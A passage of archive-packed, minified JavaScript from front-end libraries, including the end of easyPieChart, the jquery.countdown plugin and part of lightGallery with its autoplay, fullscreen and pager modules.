t;o.scaleColor||o.trackColor?i.getImageData&&i.putImageData?n?i.putImageData(n,0,0):(d(),n=i.getImageData(0,0,o.size*a,o.size*a)):(this.clear(),d()):this.clear(),i.lineCap=o.lineCap,t="function"==typeof o.barColor?o.barColor(e):o.barColor,s(t,o.lineWidth,e/100)}.bind(this),this.animate=function(n,a){var i=Date.now();o.onStart(n,a);var r=function(){var e=Math.min(Date.now()-i,o.animate.duration),t=o.easing(this,e,n,a-n,o.animate.duration);this.draw(t),o.onStep(n,a,t),e>=o.animate.duration?o.onStop(n,a):h(r)}.bind(this);h(r)}.bind(this)}function a(t,n){var a={barColor:"#ef1e25",trackColor:"#f9f9f9",scaleColor:"#dfe0e0",scaleLength:5,lineCap:"round",lineWidth:3,trackWidth:void 0,size:110,rotate:0,animate:{duration:1e3,enabled:!0},easing:function(e,t,n,a,i){return(t/=i/2)<1?a/2*t*t+n:-a/2*(--t*(t-2)-1)+n},onStart:function(e,t){},onStep:function(e,t,n){},onStop:function(e,t){}};if(void 0!==o)a.renderer=o;else{if("undefined"==typeof SVGRenderer)throw new Error("Please load either the SVG- or the CanvasRenderer");a.renderer=SVGRenderer}var i={},r=0,e=function(){for(var e in this.el=t,this.options=i,a)a.hasOwnProperty(e)&&(i[e]=n&&void 0!==n[e]?n[e]:a[e],"function"==typeof i[e]&&(i[e]=i[e].bind(this)));"string"==typeof i.easing&&"undefined"!=typeof jQuery&&jQuery.isFunction(jQuery.easing[i.easing])?i.easing=jQuery.easing[i.easing]:i.easing=a.easing,"number"==typeof i.animate&&(i.animate={duration:i.animate,enabled:!0}),"boolean"!=typeof i.animate||i.animate||(i.animate={duration:1e3,enabled:i.animate}),this.renderer=new i.renderer(t,i),this.renderer.draw(r),t.dataset&&t.dataset.percent?this.update(parseFloat(t.dataset.percent)):t.getAttribute&&t.getAttribute("data-percent")&&this.update(parseFloat(t.getAttribute("data-percent")))}.bind(this);this.update=function(e){return e=parseFloat(e),i.animate.enabled?this.renderer.animate(r,e):this.renderer.draw(e),r=e,this}.bind(this),this.disableAnimation=function(){return i.animate.enabled=!1,this},this.enableAnimation=function(){return i.animate.enabled=!0,this},e()}n.fn.easyPieChart=function(t){return this.each(function(){var e;n.data(this,"easyPieChart")||(e=n.extend({},t,n(this).data()),n.data(this,"easyPieChart",new a(this,e)))})}});PK�8FZ��js/jquery.countdown.min.jsnu�[���// CountDown Clock
// Version   : 1.0.1
// Developer : Ekrem KAYA
// Website   : http://e-piksel.com
// GitHub    : https://github.com/epiksel/countdown

!function(t){t.fn.countdown=function(e,n){function o(){var t=new Date(r.date),e=s(),o=t-e;if(0>o)return clearInterval(d),void(n&&"function"==typeof n&&n());var a=1e3,f=60*a,u=60*f,l=24*u,c=Math.floor(o/l),h=Math.floor(o%l/u),x=Math.floor(o%u/f),g=Math.floor(o%f/a),y=1===c?r.day:r.days,m=1===h?r.hour:r.hours,v=1===x?r.minute:r.minutes,D=1===g?r.second:r.seconds;c=String(c).length>=2?c:"0"+c,h=String(h).length>=2?h:"0"+h,x=String(x).length>=2?x:"0"+x,g=String(g).length>=2?g:"0"+g,i.find(".days").text(c),i.find(".hours").text(h),i.find(".minutes").text(x),i.find(".seconds").text(g),i.find(".days_text").text(y),i.find(".hours_text").text(m),i.find(".minutes_text").text(v),i.find(".seconds_text").text(D)}var r=t.extend({date:null,offset:null,day:"Day",days:"Days",hour:"Hour",hours:"Hours",minute:"Minute",minutes:"Minutes",second:"Second",seconds:"Seconds"},e);r.date||t.error("Date is not defined."),Date.parse(r.date)||t.error("Incorrect date format, it should look like this, 12/24/2012 12:00:00.");var i=this,s=function(){var t=new Date,e=t.getTime()+6e4*t.getTimezoneOffset(),n=new Date(e+36e5*r.offset);return n},d=setInterval(o,1e3)}}(jQuery);PK�8FZ�
����js/lightgallery-all.min.jsnu�[���/*! lightgallery - v1.7.0 - 2020-05-03
* http://sachinchoolur.github.io/lightGallery/
* Copyright (c) 2020 Sachin N; Licensed GPLv3 */
!function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof module&&module.exports?module.exports=b(require("jquery")):b(a.jQuery)}(this,function(a){!function(){"use strict";function b(b,d){if(this.el=b,this.$el=a(b),this.s=a.extend({},c,d),this.s.dynamic&&"undefined"!==this.s.dynamicEl&&this.s.dynamicEl.constructor===Array&&!this.s.dynamicEl.length)throw"When using dynamic mode, you must also define dynamicEl as an Array.";return this.modules={},this.lGalleryOn=!1,this.lgBusy=!1,this.hideBartimeout=!1,this.isTouch="ontouchstart"in document.documentElement,this.s.slideEndAnimatoin&&(this.s.hideControlOnEnd=!1),this.s.dynamic?this.$items=this.s.dynamicEl:"this"===this.s.selector?this.$items=this.$el:""!==this.s.selector?this.s.selectWithin?this.$items=a(this.s.selectWithin).find(this.s.selector):this.$items=this.$el.find(a(this.s.selector)):this.$items=this.$el.children(),this.$slide="",this.$outer="",this.init(),this}var c={mode:"lg-slide",cssEasing:"ease",easing:"linear",speed:600,height:"100%",width:"100%",addClass:"",startClass:"lg-start-zoom",backdropDuration:150,hideBarsDelay:6e3,useLeft:!1,ariaLabelledby:"",ariaDescribedby:"",closable:!0,loop:!0,escKey:!0,keyPress:!0,controls:!0,slideEndAnimatoin:!0,hideControlOnEnd:!1,mousewheel:!0,getCaptionFromTitleOrAlt:!0,appendSubHtmlTo:".lg-sub-html",subHtmlSelectorRelative:!1,preload:1,showAfterLoad:!0,selector:"",selectWithin:"",nextHtml:"",prevHtml:"",index:!1,iframeMaxWidth:"100%",download:!0,counter:!0,appendCounterTo:".lg-toolbar",swipeThreshold:50,enableSwipe:!0,enableDrag:!0,dynamic:!1,dynamicEl:[],galleryId:1};b.prototype.init=function(){var b=this;b.s.preload>b.$items.length&&(b.s.preload=b.$items.length);var c=window.location.hash;c.indexOf("lg="+this.s.galleryId)>0&&(b.index=parseInt(c.split("&slide=")[1],10),a("body").addClass("lg-from-hash"),a("body").hasClass("lg-on")||(setTimeout(function(){b.build(b.index)}),a("body").addClass("lg-on"))),b.s.dynamic?(b.$el.trigger("onBeforeOpen.lg"),b.index=b.s.index||0,a("body").hasClass("lg-on")||setTimeout(function(){b.build(b.index),a("body").addClass("lg-on")})):b.$items.on("click.lgcustom",function(c){try{c.preventDefault(),c.preventDefault()}catch(a){c.returnValue=!1}b.$el.trigger("onBeforeOpen.lg"),b.index=b.s.index||b.$items.index(this),a("body").hasClass("lg-on")||(b.build(b.index),a("body").addClass("lg-on"))})},b.prototype.build=function(b){var c=this;c.structure(),a.each(a.fn.lightGallery.modules,function(b){c.modules[b]=new a.fn.lightGallery.modules[b](c.el)}),c.slide(b,!1,!1,!1),c.s.keyPress&&c.keyPress(),c.$items.length>1?(c.arrow(),setTimeout(function(){c.enableDrag(),c.enableSwipe()},50),c.s.mousewheel&&c.mousewheel()):c.$slide.on("click.lg",function(){c.$el.trigger("onSlideClick.lg")}),c.counter(),c.closeGallery(),c.$el.trigger("onAfterOpen.lg"),c.$outer.on("mousemove.lg click.lg touchstart.lg",function(){c.$outer.removeClass("lg-hide-items"),clearTimeout(c.hideBartimeout),c.hideBartimeout=setTimeout(function(){c.$outer.addClass("lg-hide-items")},c.s.hideBarsDelay)}),c.$outer.trigger("mousemove.lg")},b.prototype.structure=function(){var b,c="",d="",e=0,f="",g=this;for(a("body").append('<div class="lg-backdrop"></div>'),a(".lg-backdrop").css("transition-duration",this.s.backdropDuration+"ms"),e=0;e<this.$items.length;e++)c+='<div class="lg-item"></div>';if(this.s.controls&&this.$items.length>1&&(d='<div class="lg-actions"><button aria-label="Previous slide" class="lg-prev lg-icon">'+this.s.prevHtml+'</button><button aria-label="Next slide" class="lg-next lg-icon">'+this.s.nextHtml+"</button></div>"),".lg-sub-html"===this.s.appendSubHtmlTo&&(f='<div role="status" aria-live="polite" class="lg-sub-html"></div>'),b='<div tabindex="-1" aria-modal="true" '+(this.s.ariaLabelledby?'aria-labelledby="'+this.s.ariaLabelledby+'"':"")+" "+(this.s.ariaDescribedby?'aria-describedby="'+this.s.ariaDescribedby+'"':"")+' role="dialog" class="lg-outer '+this.s.addClass+" "+this.s.startClass+'"><div class="lg" style="width:'+this.s.width+"; height:"+this.s.height+'"><div class="lg-inner">'+c+'</div><div class="lg-toolbar lg-group"><button aria-label="Close gallery" class="lg-close lg-icon"></button></div>'+d+f+"</div></div>",a("body").append(b),this.$outer=a(".lg-outer"),this.$outer.focus(),this.$slide=this.$outer.find(".lg-item"),this.s.useLeft?(this.$outer.addClass("lg-use-left"),this.s.mode="lg-slide"):this.$outer.addClass("lg-use-css3"),g.setTop(),a(window).on("resize.lg orientationchange.lg",function(){setTimeout(function(){g.setTop()},100)}),this.$slide.eq(this.index).addClass("lg-current"),this.doCss()?this.$outer.addClass("lg-css3"):(this.$outer.addClass("lg-css"),this.s.speed=0),this.$outer.addClass(this.s.mode),this.s.enableDrag&&this.$items.length>1&&this.$outer.addClass("lg-grab"),this.s.showAfterLoad&&this.$outer.addClass("lg-show-after-load"),this.doCss()){var h=this.$outer.find(".lg-inner");h.css("transition-timing-function",this.s.cssEasing),h.css("transition-duration",this.s.speed+"ms")}setTimeout(function(){a(".lg-backdrop").addClass("in")}),setTimeout(function(){g.$outer.addClass("lg-visible")},this.s.backdropDuration),this.s.download&&this.$outer.find(".lg-toolbar").append('<a id="lg-download" aria-label="Download" target="_blank" download class="lg-download lg-icon"></a>'),this.prevScrollTop=a(window).scrollTop()},b.prototype.setTop=function(){if("100%"!==this.s.height){var b=a(window).height(),c=(b-parseInt(this.s.height,10))/2,d=this.$outer.find(".lg");b>=parseInt(this.s.height,10)?d.css("top",c+"px"):d.css("top","0px")}},b.prototype.doCss=function(){return!!function(){var a=["transition","MozTransition","WebkitTransition","OTransition","msTransition","KhtmlTransition"],b=document.documentElement,c=0;for(c=0;c<a.length;c++)if(a[c]in b.style)return!0}()},b.prototype.isVideo=function(a,b){var c;if(c=this.s.dynamic?this.s.dynamicEl[b].html:this.$items.eq(b).attr("data-html"),!a)return c?{html5:!0}:(console.error("lightGallery :- data-src is not provided on slide item "+(b+1)+". Please make sure the selector property is properly configured. More info - http://sachinchoolur.github.io/lightGallery/demos/html-markup.html"),!1);var d=a.match(/\/\/(?:www\.)?youtu(?:\.be|be\.com|be-nocookie\.com)\/(?:watch\?v=|embed\/)?([a-z0-9\-\_\%]+)/i),e=a.match(/\/\/(?:www\.)?vimeo.com\/([0-9a-z\-_]+)/i),f=a.match(/\/\/(?:www\.)?dai.ly\/([0-9a-z\-_]+)/i),g=a.match(/\/\/(?:www\.)?(?:vk\.com|vkontakte\.ru)\/(?:video_ext\.php\?)(.*)/i);return d?{youtube:d}:e?{vimeo:e}:f?{dailymotion:f}:g?{vk:g}:void 0},b.prototype.counter=function(){this.s.counter&&a(this.s.appendCounterTo).append('<div id="lg-counter" role="status" aria-live="polite"><span id="lg-counter-current">'+(parseInt(this.index,10)+1)+'</span> / <span id="lg-counter-all">'+this.$items.length+"</span></div>")},b.prototype.addHtml=function(b){var c,d,e=null;if(this.s.dynamic?this.s.dynamicEl[b].subHtmlUrl?c=this.s.dynamicEl[b].subHtmlUrl:e=this.s.dynamicEl[b].subHtml:(d=this.$items.eq(b),d.attr("data-sub-html-url")?c=d.attr("data-sub-html-url"):(e=d.attr("data-sub-html"),this.s.getCaptionFromTitleOrAlt&&!e&&(e=d.attr("title")||d.find("img").first().attr("alt")))),!c)if(void 0!==e&&null!==e){var f=e.substring(0,1);"."!==f&&"#"!==f||(e=this.s.subHtmlSelectorRelative&&!this.s.dynamic?d.find(e).html():a(e).html())}else e="";".lg-sub-html"===this.s.appendSubHtmlTo?c?this.$outer.find(this.s.appendSubHtmlTo).load(c):this.$outer.find(this.s.appendSubHtmlTo).html(e):c?this.$slide.eq(b).load(c):this.$slide.eq(b).append(e),void 0!==e&&null!==e&&(""===e?this.$outer.find(this.s.appendSubHtmlTo).addClass("lg-empty-html"):this.$outer.find(this.s.appendSubHtmlTo).removeClass("lg-empty-html")),this.$el.trigger("onAfterAppendSubHtml.lg",[b])},b.prototype.preload=function(a){var b=1,c=1;for(b=1;b<=this.s.preload&&!(b>=this.$items.length-a);b++)this.loadContent(a+b,!1,0);for(c=1;c<=this.s.preload&&!(a-c<0);c++)this.loadContent(a-c,!1,0)},b.prototype.loadContent=function(b,c,d){var e,f,g,h,i,j,k,l=this,m=!1,n=function(b){for(var c=[],d=[],e=0;e<b.length;e++){var g=b[e].split(" ");""===g[0]&&g.splice(0,1),d.push(g[0]),c.push(g[1])}for(var h=a(window).width(),i=0;i<c.length;i++)if(parseInt(c[i],10)>h){f=d[i];break}};if(l.s.dynamic){if(l.s.dynamicEl[b].poster&&(m=!0,g=l.s.dynamicEl[b].poster),j=l.s.dynamicEl[b].html,f=l.s.dynamicEl[b].src,k=l.s.dynamicEl[b].alt,l.s.dynamicEl[b].responsive){n(l.s.dynamicEl[b].responsive.split(","))}h=l.s.dynamicEl[b].srcset,i=l.s.dynamicEl[b].sizes}else{var o=l.$items.eq(b);if(o.attr("data-poster")&&(m=!0,g=o.attr("data-poster")),j=o.attr("data-html"),f=o.attr("href")||o.attr("data-src"),k=o.attr("title")||o.find("img").first().attr("alt"),o.attr("data-responsive")){n(o.attr("data-responsive").split(","))}h=o.attr("data-srcset"),i=o.attr("data-sizes")}var p=!1;l.s.dynamic?l.s.dynamicEl[b].iframe&&(p=!0):"true"===l.$items.eq(b).attr("data-iframe")&&(p=!0);var q=l.isVideo(f,b);if(!l.$slide.eq(b).hasClass("lg-loaded")){if(p)l.$slide.eq(b).prepend('<div class="lg-video-cont lg-has-iframe" style="max-width:'+l.s.iframeMaxWidth+'"><div class="lg-video"><iframe class="lg-object" frameborder="0" src="'+f+'"  allowfullscreen="true"></iframe></div></div>');else if(m){var r="";r=q&&q.youtube?"lg-has-youtube":q&&q.vimeo?"lg-has-vimeo":"lg-has-html5",l.$slide.eq(b).prepend('<div class="lg-video-cont '+r+' "><div class="lg-video"><span class="lg-video-play"></span><img class="lg-object lg-has-poster" src="'+g+'" /></div></div>')}else q?(l.$slide.eq(b).prepend('<div class="lg-video-cont "><div class="lg-video"></div></div>'),l.$el.trigger("hasVideo.lg",[b,f,j])):(k=k?'alt="'+k+'"':"",l.$slide.eq(b).prepend('<div class="lg-img-wrap"><img class="lg-object lg-image" '+k+' src="'+f+'" /></div>'));if(l.$el.trigger("onAferAppendSlide.lg",[b]),e=l.$slide.eq(b).find(".lg-object"),i&&e.attr("sizes",i),h){e.attr("srcset",h);try{picturefill({elements:[e[0]]})}catch(a){console.warn("lightGallery :- If you want srcset to be supported for older browser please include picturefil version 2 javascript library in your document.")}}".lg-sub-html"!==this.s.appendSubHtmlTo&&l.addHtml(b),l.$slide.eq(b).addClass("lg-loaded")}l.$slide.eq(b).find(".lg-object").on("load.lg error.lg",function(){var c=0;d&&!a("body").hasClass("lg-from-hash")&&(c=d),setTimeout(function(){l.$slide.eq(b).addClass("lg-complete"),l.$el.trigger("onSlideItemLoad.lg",[b,d||0])},c)}),q&&q.html5&&!m&&l.$slide.eq(b).addClass("lg-complete"),!0===c&&(l.$slide.eq(b).hasClass("lg-complete")?l.preload(b):l.$slide.eq(b).find(".lg-object").on("load.lg error.lg",function(){l.preload(b)}))},b.prototype.slide=function(b,c,d,e){var f=this.$outer.find(".lg-current").index(),g=this;if(!g.lGalleryOn||f!==b){var h=this.$slide.length,i=g.lGalleryOn?this.s.speed:0;if(!g.lgBusy){if(this.s.download){var j;j=g.s.dynamic?!1!==g.s.dynamicEl[b].downloadUrl&&(g.s.dynamicEl[b].downloadUrl||g.s.dynamicEl[b].src):"false"!==g.$items.eq(b).attr("data-download-url")&&(g.$items.eq(b).attr("data-download-url")||g.$items.eq(b).attr("href")||g.$items.eq(b).attr("data-src")),j?(a("#lg-download").attr("href",j),g.$outer.removeClass("lg-hide-download")):g.$outer.addClass("lg-hide-download")}if(this.$el.trigger("onBeforeSlide.lg",[f,b,c,d]),g.lgBusy=!0,clearTimeout(g.hideBartimeout),".lg-sub-html"===this.s.appendSubHtmlTo&&setTimeout(function(){g.addHtml(b)},i),this.arrowDisable(b),e||(b<f?e="prev":b>f&&(e="next")),c){this.$slide.removeClass("lg-prev-slide lg-current lg-next-slide");var k,l;h>2?(k=b-1,l=b+1,0===b&&f===h-1?(l=0,k=h-1):b===h-1&&0===f&&(l=0,k=h-1)):(k=0,l=1),"prev"===e?g.$slide.eq(l).addClass("lg-next-slide"):g.$slide.eq(k).addClass("lg-prev-slide"),g.$slide.eq(b).addClass("lg-current")}else g.$outer.addClass("lg-no-trans"),this.$slide.removeClass("lg-prev-slide lg-next-slide"),"prev"===e?(this.$slide.eq(b).addClass("lg-prev-slide"),this.$slide.eq(f).addClass("lg-next-slide")):(this.$slide.eq(b).addClass("lg-next-slide"),this.$slide.eq(f).addClass("lg-prev-slide")),setTimeout(function(){g.$slide.removeClass("lg-current"),g.$slide.eq(b).addClass("lg-current"),g.$outer.removeClass("lg-no-trans")},50);g.lGalleryOn?(setTimeout(function(){g.loadContent(b,!0,0)},this.s.speed+50),setTimeout(function(){g.lgBusy=!1,g.$el.trigger("onAfterSlide.lg",[f,b,c,d])},this.s.speed)):(g.loadContent(b,!0,g.s.backdropDuration),g.lgBusy=!1,g.$el.trigger("onAfterSlide.lg",[f,b,c,d])),g.lGalleryOn=!0,this.s.counter&&a("#lg-counter-current").text(b+1)}g.index=b}},b.prototype.goToNextSlide=function(a){var b=this,c=b.s.loop;a&&b.$slide.length<3&&(c=!1),b.lgBusy||(b.index+1<b.$slide.length?(b.index++,b.$el.trigger("onBeforeNextSlide.lg",[b.index]),b.slide(b.index,a,!1,"next")):c?(b.index=0,b.$el.trigger("onBeforeNextSlide.lg",[b.index]),b.slide(b.index,a,!1,"next")):b.s.slideEndAnimatoin&&!a&&(b.$outer.addClass("lg-right-end"),setTimeout(function(){b.$outer.removeClass("lg-right-end")},400)))},b.prototype.goToPrevSlide=function(a){var b=this,c=b.s.loop;a&&b.$slide.length<3&&(c=!1),b.lgBusy||(b.index>0?(b.index--,b.$el.trigger("onBeforePrevSlide.lg",[b.index,a]),b.slide(b.index,a,!1,"prev")):c?(b.index=b.$items.length-1,b.$el.trigger("onBeforePrevSlide.lg",[b.index,a]),b.slide(b.index,a,!1,"prev")):b.s.slideEndAnimatoin&&!a&&(b.$outer.addClass("lg-left-end"),setTimeout(function(){b.$outer.removeClass("lg-left-end")},400)))},b.prototype.keyPress=function(){var b=this;this.$items.length>1&&a(window).on("keyup.lg",function(a){b.$items.length>1&&(37===a.keyCode&&(a.preventDefault(),b.goToPrevSlide()),39===a.keyCode&&(a.preventDefault(),b.goToNextSlide()))}),a(window).on("keydown.lg",function(a){!0===b.s.escKey&&27===a.keyCode&&(a.preventDefault(),b.$outer.hasClass("lg-thumb-open")?b.$outer.removeClass("lg-thumb-open"):b.destroy())})},b.prototype.arrow=function(){var a=this;this.$outer.find(".lg-prev").on("click.lg",function(){a.goToPrevSlide()}),this.$outer.find(".lg-next").on("click.lg",function(){a.goToNextSlide()})},b.prototype.arrowDisable=function(a){!this.s.loop&&this.s.hideControlOnEnd&&(a+1<this.$slide.length?this.$outer.find(".lg-next").removeAttr("disabled").removeClass("disabled"):this.$outer.find(".lg-next").attr("disabled","disabled").addClass("disabled"),a>0?this.$outer.find(".lg-prev").removeAttr("disabled").removeClass("disabled"):this.$outer.find(".lg-prev").attr("disabled","disabled").addClass("disabled"))},b.prototype.setTranslate=function(a,b,c){this.s.useLeft?a.css("left",b):a.css({transform:"translate3d("+b+"px, "+c+"px, 0px)"})},b.prototype.touchMove=function(b,c){var d=c-b;Math.abs(d)>15&&(this.$outer.addClass("lg-dragging"),this.setTranslate(this.$slide.eq(this.index),d,0),this.setTranslate(a(".lg-prev-slide"),-this.$slide.eq(this.index).width()+d,0),this.setTranslate(a(".lg-next-slide"),this.$slide.eq(this.index).width()+d,0))},b.prototype.touchEnd=function(a){var b=this;"lg-slide"!==b.s.mode&&b.$outer.addClass("lg-slide"),this.$slide.not(".lg-current, .lg-prev-slide, .lg-next-slide").css("opacity","0"),setTimeout(function(){b.$outer.removeClass("lg-dragging"),a<0&&Math.abs(a)>b.s.swipeThreshold?b.goToNextSlide(!0):a>0&&Math.abs(a)>b.s.swipeThreshold?b.goToPrevSlide(!0):Math.abs(a)<5&&b.$el.trigger("onSlideClick.lg"),b.$slide.removeAttr("style")}),setTimeout(function(){b.$outer.hasClass("lg-dragging")||"lg-slide"===b.s.mode||b.$outer.removeClass("lg-slide")},b.s.speed+100)},b.prototype.enableSwipe=function(){var a=this,b=0,c=0,d=!1;a.s.enableSwipe&&a.doCss()&&(a.$slide.on("touchstart.lg",function(c){a.$outer.hasClass("lg-zoomed")||a.lgBusy||(c.preventDefault(),a.manageSwipeClass(),b=c.originalEvent.targetTouches[0].pageX)}),a.$slide.on("touchmove.lg",function(e){a.$outer.hasClass("lg-zoomed")||(e.preventDefault(),c=e.originalEvent.targetTouches[0].pageX,a.touchMove(b,c),d=!0)}),a.$slide.on("touchend.lg",function(){a.$outer.hasClass("lg-zoomed")||(d?(d=!1,a.touchEnd(c-b)):a.$el.trigger("onSlideClick.lg"))}))},b.prototype.enableDrag=function(){var b=this,c=0,d=0,e=!1,f=!1;b.s.enableDrag&&b.doCss()&&(b.$slide.on("mousedown.lg",function(d){b.$outer.hasClass("lg-zoomed")||b.lgBusy||a(d.target).text().trim()||(d.preventDefault(),b.manageSwipeClass(),c=d.pageX,e=!0,b.$outer.scrollLeft+=1,b.$outer.scrollLeft-=1,b.$outer.removeClass("lg-grab").addClass("lg-grabbing"),b.$el.trigger("onDragstart.lg"))}),a(window).on("mousemove.lg",function(a){e&&(f=!0,d=a.pageX,b.touchMove(c,d),b.$el.trigger("onDragmove.lg"))}),a(window).on("mouseup.lg",function(g){f?(f=!1,b.touchEnd(d-c),b.$el.trigger("onDragend.lg")):(a(g.target).hasClass("lg-object")||a(g.target).hasClass("lg-video-play"))&&b.$el.trigger("onSlideClick.lg"),e&&(e=!1,b.$outer.removeClass("lg-grabbing").addClass("lg-grab"))}))},b.prototype.manageSwipeClass=function(){var a=this.index+1,b=this.index-1;this.s.loop&&this.$slide.length>2&&(0===this.index?b=this.$slide.length-1:this.index===this.$slide.length-1&&(a=0)),this.$slide.removeClass("lg-next-slide lg-prev-slide"),b>-1&&this.$slide.eq(b).addClass("lg-prev-slide"),this.$slide.eq(a).addClass("lg-next-slide")},b.prototype.mousewheel=function(){var a=this;a.$outer.on("mousewheel.lg",function(b){b.deltaY&&(b.deltaY>0?a.goToPrevSlide():a.goToNextSlide(),b.preventDefault())})},b.prototype.closeGallery=function(){var b=this,c=!1;this.$outer.find(".lg-close").on("click.lg",function(){b.destroy()}),b.s.closable&&(b.$outer.on("mousedown.lg",function(b){c=!!(a(b.target).is(".lg-outer")||a(b.target).is(".lg-item ")||a(b.target).is(".lg-img-wrap"))}),b.$outer.on("mousemove.lg",function(){c=!1}),b.$outer.on("mouseup.lg",function(d){(a(d.target).is(".lg-outer")||a(d.target).is(".lg-item ")||a(d.target).is(".lg-img-wrap")&&c)&&(b.$outer.hasClass("lg-dragging")||b.destroy())}))},b.prototype.destroy=function(b){var c=this;b||(c.$el.trigger("onBeforeClose.lg"),a(window).scrollTop(c.prevScrollTop)),b&&(c.s.dynamic||this.$items.off("click.lg click.lgcustom"),a.removeData(c.el,"lightGallery")),this.$el.off(".lg.tm"),a.each(a.fn.lightGallery.modules,function(a){c.modules[a]&&c.modules[a].destroy()}),this.lGalleryOn=!1,clearTimeout(c.hideBartimeout),this.hideBartimeout=!1,a(window).off(".lg"),a("body").removeClass("lg-on lg-from-hash"),c.$outer&&c.$outer.removeClass("lg-visible"),a(".lg-backdrop").removeClass("in"),setTimeout(function(){c.$outer&&c.$outer.remove(),a(".lg-backdrop").remove(),b||c.$el.trigger("onCloseAfter.lg"),c.$el.focus()},c.s.backdropDuration+50)},a.fn.lightGallery=function(c){return this.each(function(){if(a.data(this,"lightGallery"))try{a(this).data("lightGallery").init()}catch(a){console.error("lightGallery has not initiated properly")}else a.data(this,"lightGallery",new b(this,c))})},a.fn.lightGallery.modules={}}()}),function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof module&&module.exports?module.exports=b(require("jquery")):b(a.jQuery)}(this,function(a){!function(){"use strict";var b={autoplay:!1,pause:5e3,progressBar:!0,fourceAutoplay:!1,autoplayControls:!0,appendAutoplayControlsTo:".lg-toolbar"},c=function(c){return this.core=a(c).data("lightGallery"),this.$el=a(c),!(this.core.$items.length<2)&&(this.core.s=a.extend({},b,this.core.s),this.interval=!1,this.fromAuto=!0,this.canceledOnTouch=!1,this.fourceAutoplayTemp=this.core.s.fourceAutoplay,this.core.doCss()||(this.core.s.progressBar=!1),this.init(),this)};c.prototype.init=function(){var a=this;a.core.s.autoplayControls&&a.controls(),a.core.s.progressBar&&a.core.$outer.find(".lg").append('<div class="lg-progress-bar"><div class="lg-progress"></div></div>'),a.progress(),a.core.s.autoplay&&a.$el.one("onSlideItemLoad.lg.tm",function(){a.startlAuto()}),a.$el.on("onDragstart.lg.tm touchstart.lg.tm",function(){a.interval&&(a.cancelAuto(),a.canceledOnTouch=!0)}),a.$el.on("onDragend.lg.tm touchend.lg.tm onSlideClick.lg.tm",function(){!a.interval&&a.canceledOnTouch&&(a.startlAuto(),a.canceledOnTouch=!1)})},c.prototype.progress=function(){var a,b,c=this;c.$el.on("onBeforeSlide.lg.tm",function(){c.core.s.progressBar&&c.fromAuto&&(a=c.core.$outer.find(".lg-progress-bar"),b=c.core.$outer.find(".lg-progress"),c.interval&&(b.removeAttr("style"),a.removeClass("lg-start"),setTimeout(function(){b.css("transition","width "+(c.core.s.speed+c.core.s.pause)+"ms ease 0s"),a.addClass("lg-start")},20))),c.fromAuto||c.core.s.fourceAutoplay||c.cancelAuto(),c.fromAuto=!1})},c.prototype.controls=function(){var b=this;a(this.core.s.appendAutoplayControlsTo).append('<button aria-label="Toggle autoplay" class="lg-autoplay-button lg-icon"></button>'),b.core.$outer.find(".lg-autoplay-button").on("click.lg",function(){a(b.core.$outer).hasClass("lg-show-autoplay")?(b.cancelAuto(),b.core.s.fourceAutoplay=!1):b.interval||(b.startlAuto(),b.core.s.fourceAutoplay=b.fourceAutoplayTemp)})},c.prototype.startlAuto=function(){var a=this;a.core.$outer.find(".lg-progress").css("transition","width "+(a.core.s.speed+a.core.s.pause)+"ms ease 0s"),a.core.$outer.addClass("lg-show-autoplay"),a.core.$outer.find(".lg-progress-bar").addClass("lg-start"),a.interval=setInterval(function(){a.core.index+1<a.core.$items.length?a.core.index++:a.core.index=0,a.fromAuto=!0,a.core.slide(a.core.index,!1,!1,"next")},a.core.s.speed+a.core.s.pause)},c.prototype.cancelAuto=function(){clearInterval(this.interval),this.interval=!1,this.core.$outer.find(".lg-progress").removeAttr("style"),this.core.$outer.removeClass("lg-show-autoplay"),this.core.$outer.find(".lg-progress-bar").removeClass("lg-start")},c.prototype.destroy=function(){this.cancelAuto(),this.core.$outer.find(".lg-progress-bar").remove()},a.fn.lightGallery.modules.autoplay=c}()}),function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof module&&module.exports?module.exports=b(require("jquery")):b(a.jQuery)}(this,function(a){!function(){"use strict";function b(){return document.fullscreenElement||document.mozFullScreenElement||document.webkitFullscreenElement||document.msFullscreenElement}var c={fullScreen:!0},d=function(b){return this.core=a(b).data("lightGallery"),this.$el=a(b),this.core.s=a.extend({},c,this.core.s),this.init(),this};d.prototype.init=function(){var a="";if(this.core.s.fullScreen){if(!(document.fullscreenEnabled||document.webkitFullscreenEnabled||document.mozFullScreenEnabled||document.msFullscreenEnabled))return;a='<button aria-label="Toggle fullscreen" class="lg-fullscreen lg-icon"></button>',this.core.$outer.find(".lg-toolbar").append(a),this.fullScreen()}},d.prototype.requestFullscreen=function(){var a=document.documentElement;a.requestFullscreen?a.requestFullscreen():a.msRequestFullscreen?a.msRequestFullscreen():a.mozRequestFullScreen?a.mozRequestFullScreen():a.webkitRequestFullscreen&&a.webkitRequestFullscreen()},d.prototype.exitFullscreen=function(){document.exitFullscreen?document.exitFullscreen():document.msExitFullscreen?document.msExitFullscreen():document.mozCancelFullScreen?document.mozCancelFullScreen():document.webkitExitFullscreen&&document.webkitExitFullscreen()},d.prototype.fullScreen=function(){var c=this;a(document).on("fullscreenchange.lg webkitfullscreenchange.lg mozfullscreenchange.lg MSFullscreenChange.lg",function(){c.core.$outer.toggleClass("lg-fullscreen-on")}),this.core.$outer.find(".lg-fullscreen").on("click.lg",function(){b()?c.exitFullscreen():c.requestFullscreen()})},d.prototype.destroy=function(){b()&&this.exitFullscreen(),a(document).off("fullscreenchange.lg webkitfullscreenchange.lg mozfullscreenchange.lg MSFullscreenChange.lg")},a.fn.lightGallery.modules.fullscreen=d}()}),function(a,b){"function"==typeof define&&define.amd?define(["jquery"],function(a){return b(a)}):"object"==typeof exports?module.exports=b(require("jquery")):b(jQuery)}(0,function(a){!function(){"use strict";var b={pager:!1},c=function(c){return this.core=a(c).data("lightGallery"),this.$el=a(c),this.core.s=a.extend({},b,this.core.s),this.core.s.pager&&this.core.$items.length>1&&this.init(),this};c.prototype.init=function(){var b,c,d,e=this,f="";if(e.core.$outer.find(".lg").append('<div class="lg-pager-outer"></div>'),e.core.s.dynamic)for(var g=0;g<e.core.s.dynamicEl.length;g++)f+='<span class="lg-pager-cont"> <span class="lg-pager"></span><div class="lg-pager-thumb-cont"><span class="lg-caret"></span> <img src="'+e.core.s.dynamicEl[g].thumb+'" /></div></span>';else e.core.$items.each(function(){e.core.s.exThumbImage?f+='<span 